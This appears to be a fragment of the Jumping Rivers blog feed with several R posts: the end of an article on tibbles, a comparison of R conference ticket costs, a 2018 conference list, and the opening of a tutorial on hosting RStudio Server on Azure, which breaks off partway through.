&lt;p&gt;This won’t be long, there’s only one. Some older packages don’t work with tibbles because of their alternative subsetting method. They expect &lt;code&gt;tib[, 1]&lt;/code&gt; to return a vector, when in fact it will now return another tibble. Until this functionality is added in you must convert your tibble back to a data frame using &lt;code&gt;as.data.frame()&lt;/code&gt;. Whilst adding this functionality will give users the chance to use packages with tibbles and normal data frames, it of course puts extra work on the shoulders of package writers, who now have to change every package to be compatible with tibbles. For more on this discussion, see &lt;a href="https://stat.ethz.ch/pipermail/r-package-devel/2017q3/001896.html" rel="external"&gt;this thread&lt;/a&gt;.&lt;/p&gt;
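&lt;p&gt;A minimal sketch of that workaround, assuming a hypothetical legacy function &lt;code&gt;old_fun()&lt;/code&gt; (invented here for illustration) that expects &lt;code&gt;x[, 1]&lt;/code&gt; to be a plain vector:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;tibble&amp;#34;)

# Hypothetical stand-in for an older package function that
# assumes x[, 1] is a plain vector.
old_fun = function(x) mean(x[, 1])

tib_in = tibble(a = c(1, 2, 3), b = c(&amp;#34;x&amp;#34;, &amp;#34;y&amp;#34;, &amp;#34;z&amp;#34;))

# Convert back to a standard data frame before handing it over.
result = old_fun(as.data.frame(tib_in))
result  # 2
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;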
&lt;h2 id="to-summarise"&gt;To summarise..&lt;/h2&gt;
&lt;p&gt;So, most of the things you can accomplish with tibbles, you can accomplish with &lt;code&gt;data.frame()&lt;/code&gt;, but it’s a bit of a pain. Simple things like checking the dimensions of your data or converting strings to factors are small jobs. Small jobs that take time. With tibbles they take no time. Tibbles force you to look at your data earlier and confront the problems earlier, ultimately leading to cleaner code.&lt;/p&gt;
&lt;p&gt;Thanks for chatting!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/the-trouble-with-tibbles/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Conference Cost</title><link>https://www.jumpingrivers.com/blog/conference-cost-2017/</link><pubDate>Mon, 18 Dec 2017 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/conference-cost-2017/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/conference-cost-2017/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/conference-cost-2017/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;In last week’s &lt;a href="https://www.jumpingrivers.com/blog/upcoming-r-conferences-2018/"&gt;post&lt;/a&gt; we tantalised you with upcoming R &amp;amp; data science conferences, but from a cost point of view, not all R conferences are the same. Using the R &lt;a href="https://jumpingrivers.github.io/meetingsR/" rel="external"&gt;conference&lt;/a&gt; site, it’s fairly easy to compare the cost of previous R conferences.&lt;/p&gt;
&lt;p&gt;I selected the main conferences over the last few years and obtained the cost for the full ticket (including any tutorial days, but ignoring any discounts). Next, I converted all prices to dollars and calculated the cost per day.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Conference&lt;/th&gt;
&lt;th&gt;Cost ($)&lt;/th&gt;
&lt;th&gt;Days&lt;/th&gt;
&lt;th&gt;Cost per day ($)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;eRum 2016&lt;/td&gt;
&lt;td&gt;30&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;satRday 2017&lt;/td&gt;
&lt;td&gt;82&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;27&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;useR! 2017&lt;/td&gt;
&lt;td&gt;770&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;192&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;R Finance 2017&lt;/td&gt;
&lt;td&gt;600&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;300&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;rstudio::conf 2018&lt;/td&gt;
&lt;td&gt;995&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;331&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;New York R&lt;/td&gt;
&lt;td&gt;725&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;362&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Earl London&lt;/td&gt;
&lt;td&gt;1191&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;397&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
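&lt;p&gt;The per-day figures can be reproduced with a few lines of R. This is only a sketch: the costs and day counts are copied from the table above, and dropping the fractional dollar is an assumption that happens to match the published column.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;conf = data.frame(
  conference = c(&amp;#34;eRum 2016&amp;#34;, &amp;#34;satRday 2017&amp;#34;, &amp;#34;useR! 2017&amp;#34;,
                 &amp;#34;R Finance 2017&amp;#34;, &amp;#34;rstudio::conf 2018&amp;#34;,
                 &amp;#34;New York R&amp;#34;, &amp;#34;Earl London&amp;#34;),
  cost = c(30, 82, 770, 600, 995, 725, 1191),
  days = c(3, 3, 4, 2, 3, 2, 3)
)

# Integer division drops the fractional dollar,
# e.g. 995 / 3 = 331.67 becomes 331.
conf$per_day = conf$cost %/% conf$days

# Order from cheapest to most expensive per day.
conf[order(conf$per_day), ]
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;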
&lt;p&gt;The conferences fall into two camps: &lt;em&gt;business oriented&lt;/em&gt; and more &lt;em&gt;general&lt;/em&gt; R conferences; useR! is somewhere in the middle. A simple bar plot highlights the extreme difference in cost per day.&lt;/p&gt;
&lt;img class="image-center" src="conf-cost-1.svg" style="width:500px; max-width:100%"&gt;
&lt;p&gt;The organisers of &lt;a href="http://erum.ue.poznan.pl/" rel="external"&gt;eRum&lt;/a&gt; and &lt;a href="http://satrdays.org/capetown2017/" rel="external"&gt;SatRdays&lt;/a&gt; should be proud of themselves for keeping the cost down; it would also be really useful if the organisers wrote a blog post giving more general tips for keeping the cost down.&lt;/p&gt;
&lt;p&gt;I’m going to resist commenting on the conferences since I have only ever attended useR! (which is excellent), but in terms of speakers, most conferences have the same keynotes, so this year I’ll be looking at &lt;a href="http://2018.erum.io/" rel="external"&gt;eRum&lt;/a&gt; 2018 (sadly useR! is a bit too far away from me).&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/conference-cost-2017/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Upcoming R conferences (2018)</title><link>https://www.jumpingrivers.com/blog/upcoming-r-conferences-2018/</link><pubDate>Tue, 12 Dec 2017 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/upcoming-r-conferences-2018/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/upcoming-r-conferences-2018/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/upcoming-r-conferences-2018/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;It’s that time of year when we need to start thinking about what R Conferences we would like to (and can!) attend. To help plan your (ahem) work trips, we thought it would be useful to list the upcoming main attractions.&lt;/p&gt;
&lt;p&gt;We maintain a list of &lt;a href="https://jumpingrivers.github.io/meetingsR/" rel="external"&gt;upcoming rstats&lt;/a&gt; conferences. To keep up to date, just follow our &lt;a href="https://twitter.com/rstats_meetings" rel="external"&gt;twitter bot&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="rstudioconf-san-diego-usa"&gt;rstudio::conf (San Diego, USA)&lt;/h4&gt;
&lt;blockquote&gt;
&lt;p&gt;rstudio::conf is about all things R and RStudio&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The next RStudio conference is held in San Diego, and boasts top quality speakers from around the R world. With excellent tutorials and great talks, this is certainly one of the top events. The estimated cost is around $200 per day, so not the cheapest option, but worthwhile.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;January 31, Feb 1-3: &lt;a href="https://www.rstudio.com/conference/" rel="external"&gt;rstudio::conf&lt;/a&gt;. San Diego, USA.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="satrday-cape-town-south-africa"&gt;SatRday (Cape Town, South Africa)&lt;/h4&gt;
&lt;blockquote&gt;
&lt;p&gt;An opportunity to hear from and network with top Researchers, Data Scientists and Developers from the R community in South Africa and beyond.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This workshop combines an amazing location and great speakers with an amazing price (only $70 per day). The keynote speakers are Maëlle Salmon and Stephanie Kovalchik. This year’s SatRday has two tutorials, one on package building and the other on sports modelling.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;March 17th: &lt;a href="http://capetown2018.satrdays.org/" rel="external"&gt;SatRday&lt;/a&gt;. Cape Town, South Africa.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="erum2018"&gt;eRum 2018 (Budapest, Hungary)&lt;/h4&gt;
&lt;p&gt;The European R Users Meeting, eRum, is an international conference that aims at integrating users of the R language living in Europe. This conference is similar to useR!.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;May: &lt;a href="http://2018.erum.io/" rel="external"&gt;The European #rstats Users Meeting&lt;/a&gt;. Budapest, Hungary. &lt;a href="https://twitter.com/erum2018" rel="external"&gt;@erum2018&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="rfinance-2018-chicago-usa"&gt;R/Finance 2018 (Chicago, USA)&lt;/h4&gt;
&lt;p&gt;From the inaugural conference in 2009, the annual R/Finance conference in Chicago has become the primary meeting for academics and practitioners interested in using R in Finance. Participants from academia and industry mingle for two days to exchange ideas about current research, best practices and applications. A single-track program permits continued focus on a series of refereed submissions. We hear that a lively social program rounds out the event.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;June 1-2: &lt;a href="http://www.rinfinance.com" rel="external"&gt;R/Finance 2018&lt;/a&gt;. Chicago, USA.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="user-2018-brisbane-australia"&gt;useR! 2018 (Brisbane, Australia)&lt;/h4&gt;
&lt;p&gt;With useR! 2017 spanning five days and boasting some of the biggest names in data science, the next instalment of the useR! series is sure to be even better. Last year the program was packed with speakers, programmes and tutorials from industry and academia. Each day usually contains numerous tutorials and ends with a keynote speech followed by dinner(!). Registration opens in January 2018.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;July 10-13: &lt;a href="https://user2018.r-project.org/" rel="external"&gt;useR! 2018&lt;/a&gt;. Brisbane, Australia.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="noreastr-conference-north-east-usa"&gt;Noreast’R Conference (North East USA)&lt;/h4&gt;
&lt;p&gt;Born on Twitter, the Noreast’R Conference is a grassroots effort to organize a regional #rstats conference in the Northeastern United States. Work is currently under way and further details will follow on the Noreast’R website and Twitter page (linked below).&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://noreastrconf.com/" rel="external"&gt;Noreast’R Conference&lt;/a&gt;. USA. &lt;a href="https://twitter.com/noreastrconf/" rel="external"&gt;@noreastrconf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/upcoming-r-conferences-2018/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Hosting RStudio Server on Azure</title><link>https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/</link><pubDate>Sat, 02 Dec 2017 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/#cant-be-bothered-reading-tell-me-now"&gt;Can’t be bothered reading, tell me now&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/#getting-started"&gt;Getting started&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/#setting-up-r"&gt;Setting up R&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/#opening-ports-ready-for-rstudio"&gt;Opening ports ready for RStudio&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/#installing-rstudio"&gt;Installing RStudio&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/#nicer-urls"&gt;Nicer URLs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/#adding-ssl"&gt;Adding SSL&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="cant-be-bothered-reading-tell-me-now"&gt;Can’t be bothered reading, tell me now&lt;/h2&gt;
&lt;p&gt;Host RStudio Server on an Azure instance. Configure the instance so that RStudio can be accessed with a &lt;em&gt;nice&lt;/em&gt; URL.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2017-hosting-rstudio-server-on-azure"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="getting-started"&gt;Getting started&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://azure.microsoft.com/" rel="external"&gt;Azure&lt;/a&gt; is a cloud computing platform provided by Microsoft, the same idea as AWS from Amazon. In this post, we’ll describe how to use Azure to run &lt;a href="https://www.rstudio.com/products/rstudio/download-server/" rel="external"&gt;RStudio Server&lt;/a&gt; in the cloud.&lt;/p&gt;
&lt;p&gt;Unfortunately, things don’t start well - Microsoft have made an endurance test of getting started with Azure. The first stop is the &lt;a href="https://azure.microsoft.com/en-gb/" rel="external"&gt;Azure&lt;/a&gt; web-page. On this page&lt;/p&gt;
&lt;img class="image-center" src="azure_home.png" style="width:500px; class:image-center"&gt;
&lt;p&gt;click on &lt;strong&gt;Free Account&lt;/strong&gt; and follow the instructions. This is a bit of a painful process that will require&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Email confirmation&lt;/li&gt;
&lt;li&gt;Text confirmation&lt;/li&gt;
&lt;li&gt;Credit Card confirmation&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Eventually you should get to the dashboard page!&lt;/p&gt;
&lt;img class="image-center" src="azure_dashboard.png" style="width:500px; class:image-center"&gt;
&lt;p&gt;Clicking on &lt;code&gt;Create Resources&lt;/code&gt; will take you to the marketplace&lt;/p&gt;
&lt;img class="image-center" src="azure_marketplace.png" style="width:500px; class:image-center"&gt;
&lt;p&gt;Selecting &lt;code&gt;Ubuntu Server&lt;/code&gt; will launch a dialogue box with four steps:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Step 1: Basics: configuration settings
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Name&lt;/strong&gt;: A name for the virtual machine, e.g. &lt;code&gt;rstudio&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;User name&lt;/strong&gt;: The master user who will have &lt;code&gt;sudo&lt;/code&gt; access, e.g. &lt;code&gt;userX&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Authentication type&lt;/strong&gt;: Either choose an SSH public key or enter a password&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Resource group&lt;/strong&gt;: Since this is your first instance, create a new one, say &lt;code&gt;rstudio-group&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Location&lt;/strong&gt;: Where your machine will be located&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Step 2: Virtual machine size
&lt;ul&gt;
&lt;li&gt;Select the machine you want. Choose the smallest for the purposes of this exercise&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Step 3: Settings
&lt;ul&gt;
&lt;li&gt;Nothing to change here&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Step 4: Summary
&lt;ul&gt;
&lt;li&gt;Click create and we’re good to go!&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;After around a minute or so, your virtual machine will be ready.&lt;/p&gt;
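&lt;p&gt;If you prefer the command line to the portal, the four steps above can be roughly sketched with the Azure CLI. This assumes the &lt;code&gt;az&lt;/code&gt; tool is installed and that you have already run &lt;code&gt;az login&lt;/code&gt;. The location, image alias and machine size are illustrative assumptions rather than values from the walkthrough, so check them against what is available in your subscription.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;# Assumed values: westeurope, Ubuntu2204 and Standard_B1s are examples only
# Step 1: create the resource group
az group create --name rstudio-group --location westeurope
# Steps 1-4: name, user, authentication (ssh key), size, then create
az vm create \
  --resource-group rstudio-group \
  --name rstudio \
  --image Ubuntu2204 \
  --size Standard_B1s \
  --admin-username userX \
  --generate-ssh-keys
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;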
&lt;h2 id="setting-up-r"&gt;Setting up R&lt;/h2&gt;
&lt;p&gt;The next step is to &lt;code&gt;ssh&lt;/code&gt; into your instance. On the dashboard screen, click on the new box that shows your virtual machine. Select &lt;code&gt;Networking&lt;/code&gt;. Near the top of the screen will be a Public IP address, of the form XXX.XXX.XXX.XXX. In my case, the IP address is 52.233.194.195.&lt;/p&gt;
&lt;img class="image-center" src="azure_networking.png" style="width:500px; class:image-center"&gt;
&lt;p&gt;Make a note of your address. Next &lt;code&gt;ssh&lt;/code&gt; into your instance via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ssh userX@XXX.XXX.XXX.XXX
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To ensure that Ubuntu is up to date on our virtual machine, we invoke super sudo powers. First we update the list of Ubuntu packages&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt-get update
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then we upgrade as necessary&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt-get upgrade
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we get on with the business of installing R. To use the latest version we need to add a new &lt;a href="https://cran.r-project.org/bin/linux/ubuntu/README.html" rel="external"&gt;repository&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo add-apt-repository ppa:marutter/rrutter
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then update again and install base R&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt-get update
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt-get install r-base
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Depending on what R packages you want to install it’s worth installing a couple of other things at this point&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt-get install libxml2 libxml2-dev &lt;span style="color:#8b949e;font-style:italic"&gt;# igraph&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt-get install libcairo2-dev &lt;span style="color:#8b949e;font-style:italic"&gt;# Graphics packages&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt-get install libssl-dev libcurl4-openssl-dev &lt;span style="color:#8b949e;font-style:italic"&gt;# httr&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With an eye to the future it’s also worth installing &lt;code&gt;apache2&lt;/code&gt; to help with redirects&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt-get install apache2
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="opening-ports-ready-for-rstudio"&gt;Opening ports ready for RStudio&lt;/h2&gt;
&lt;p&gt;Whenever you access a web page, the browser specifies a &lt;em&gt;port&lt;/em&gt;. Standard HTTP pages use port 80, while secure HTTPS pages use port 443. For example, when we type&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;https://www.jumpingrivers.com
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;in the browser, this is converted to&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;https://www.jumpingrivers.com:443
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;By default our Azure instance only has port 22 open (the port used for SSH communication). To access RStudio, we’ll need to open the following ports&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;80 (for http)&lt;/li&gt;
&lt;li&gt;443 (for https); only required if we implement SSL&lt;/li&gt;
&lt;li&gt;8787 - the default RStudio port. In the last section, we’ll remove this, but just now it’s handy to have it open for testing.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Under &lt;code&gt;Networking&lt;/code&gt;, click &lt;code&gt;Add inbound port rule&lt;/code&gt; and add the three ports (80, 443, 8787):&lt;/p&gt;
&lt;img class="image-center" src="azure_dashboard_port.png" style="width:500px; class:image-center"&gt;
&lt;p&gt;If everything is working, you should be able to enter &lt;code&gt;XXX.XXX.XXX.XXX&lt;/code&gt; in your browser and see the &lt;code&gt;Apache2 Ubuntu Default Page&lt;/code&gt; with the title &lt;strong&gt;It works!&lt;/strong&gt;&lt;/p&gt;
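&lt;p&gt;The same three inbound rules can also be added from the command line. The following is a minimal sketch, assuming the Azure CLI is installed and logged in, and reusing the &lt;code&gt;rstudio-group&lt;/code&gt; and &lt;code&gt;rstudio&lt;/code&gt; names chosen earlier. The priority numbers are arbitrary assumptions; they only need to be unique within the network security group.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;# Each rule needs its own priority; the values here are arbitrary
az vm open-port --resource-group rstudio-group --name rstudio --port 80 --priority 1010
az vm open-port --resource-group rstudio-group --name rstudio --port 443 --priority 1020
az vm open-port --resource-group rstudio-group --name rstudio --port 8787 --priority 1030

# From your own machine: ask Apache for its response headers on port 80
curl -I http://XXX.XXX.XXX.XXX
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;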
&lt;h2 id="installing-rstudio"&gt;Installing RStudio&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.rstudio.com/products/rstudio/download-server/" rel="external"&gt;Installing RStudio&lt;/a&gt; Server is now relatively easy:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Check the above link for updates to the version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo apt-get install gdebi-core
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;wget https://download2.rstudio.org/rstudio-server-1.1.383-amd64.deb
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo gdebi rstudio-server-1.1.383-amd64.deb
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If everything works correctly, you should be able to view RStudio Server via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;XXX.XXX.XXX.XXX:8787
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If the page &lt;em&gt;hangs&lt;/em&gt;, double check you have opened port 8787 under the network settings.&lt;/p&gt;
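&lt;p&gt;If the port is open and the page still does not load, it may help to check the service from inside the virtual machine. The commands below are a small diagnostic sketch, not part of the original setup; they assume you are logged in over &lt;code&gt;ssh&lt;/code&gt; with &lt;code&gt;sudo&lt;/code&gt; access and that &lt;code&gt;curl&lt;/code&gt; is installed.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;# Is the RStudio Server service running?
sudo rstudio-server status

# Is anything listening on the default RStudio port?
sudo ss -ltnp | grep 8787

# Does RStudio answer locally, bypassing the Azure network rules?
curl -I http://localhost:8787
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If the local request succeeds but the browser still hangs, the problem is more likely to be the inbound port rule than RStudio itself.&lt;/p&gt;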
&lt;h2 id="nicer-urls"&gt;Nicer URLs&lt;/h2&gt;
&lt;p&gt;The first step is to access the page via a standard URL and not an IP address. In the main dashboard screen, under all resources, click on&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rstudio-ip Public IP address
